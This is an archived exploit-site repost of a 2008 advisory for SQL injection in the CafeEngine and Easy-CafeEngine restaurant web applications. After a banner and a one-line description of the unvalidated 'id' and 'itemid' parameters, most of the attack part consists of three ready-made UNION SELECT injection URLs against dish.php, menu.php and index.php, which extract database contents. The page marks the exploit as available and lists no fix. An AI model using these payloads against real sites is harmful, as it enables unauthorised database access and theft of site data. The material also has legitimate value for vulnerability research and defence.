首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CafeEngine Multiple Remote SQL Injection Vulnerabilities
来源:vfocus.net 作者:vfocus 发布时间:2008-10-20  
   ___________________________________________________________________________________________________________
  |  _          __  ___  ___ __________________     ___  ___ ____  ______  __  ___ _________________ _______  |
  | | |        / / /  / /  //_______   _______/    /  / /  //    ||  ____||  |/  //     ___________//       \ |
  | | |  ^    / / /  /_/  /  /__/  /  /___    ___ /  /_/  //     ||  |    |  v  //     /___        /    O   / |
  | | | / \  / / /   _   /  /  /  /  ____/   /__//  __   //  /|  ||  |    |     \\    ____/       /        /  |
  | | |/   \/ / /  / /  /  /  /  /  /_______    /  / /  //  /_|  ||  |___ |  |\  \\  /__________ /    /\   \  | 
  | | /  /\  / /__/ /__/  /__/  /__________/   /__/ /__//________||______||__| \__\\___________//____/  \___\ | 
  | |   /  \/                                                                                                 | 
  | |  / _____________________________________________________________________________________________________|
  | | / /                            .: CafeEngine Multipe remote SQL Injection :.                            | 
  | |/ /______________________________________________________________________________________________________|
  | v / Discoverd By:  0xFFFFFF                            . Main THX: ALLAH                                  |
  |  /  Home:          www.white-hacker.com                . Greetz To: All Hackers & WHITE-HACKER Team       | 
  | /   Mail:          admin(at)white-hacker[dot]com       .                                                  |
  |/    Country:       Algeria                             .                                                  |
  v___________________________________________________________________________________________________________|
  |     Publication info :.                                                                                   |
  |___________________________________________________________________________________________________________|
  |     Date:          19-09-2008                          . Method   :         [*] GET   [ ] POST            |
  |     Content:       Vulnerability                       . Register Globals : [ ] ON    [*] OFF             |
  |     Type:          SQL injection                       . Magic quotes :     [*] ON    [ ] OFF             | 
  |     Application:   Easy-Cafeengine / Cafeengine        . Risk:              [*] High  [ ] medium  [ ] Low | 
  |     Venedor site:  http://cafeengine.com/              .                                                  | 
  |     Version:       N/A                                 .                                                  |
  |     Impact:        Exploring Database                  .                                                  |
  |     Exploit:       Available                           .                                                  |
  |     Fix:           N/A                                 .                                                  |
  |___________________________________________________________________________________________________________|
  | Description :.                                                                                            |
  |___________________________________________________________________________________________________________|
  | Input "id" passed into dish.php,menu.php pages is not properly verified,                                  | 
  | a visitor can easily get sensitive information from the database by injecting SQL Querys                  |
  | ......................................................................................................... |
  |                                                                                                           |
  | CafeEngine Exploit :                                                                                      | 
  | [Site]dish.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10                                            |
  | [Site]menu.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12                                      |
  |                                                                                                           | 
  | Easy-CafeEngine Exploit:                                                                                  | 
  | [Site]index.php?itemid=-1+union+select+1,2,3,version(),5,6,7,8,9                                          |
  |___________________________________________________________________________________________________________|
  | Notice :.                                                                                                 |
  |___________________________________________________________________________________________________________|
  | These publications are published for educational purpose thus the author will be not responsible          |
  | for any damage.                                                                                           |
  |___________________________________________________________________________________________________________|
                                                \  漏 WHITE-HACKER  All contents 漏 2008. All rights reserved.  |
                                                 \____________________________________________________________|

# [2008-10-16]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Hummingbird <= 13.0 ActiveX Re
·Mosaic Commerce (category.php
·myEvent 1.6 (viewevent.php) Re
·Mic_blog 0.0.3 (SQL Injection/
·myStats (hits.php) Multiple Re
·IP Reg <= 0.4 Multiple Remote
·AstroSPACES (id) Remote SQL In
·PokerMax Poker League Insecure
·MS Windows XP/2003 AFD.sys Pri
·Kure 0.6.3 (index.php post,doc
·VLC 0.9.2 Media Player XSPF Me
·Mantis Bug Tracker <= 1.1.3 Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved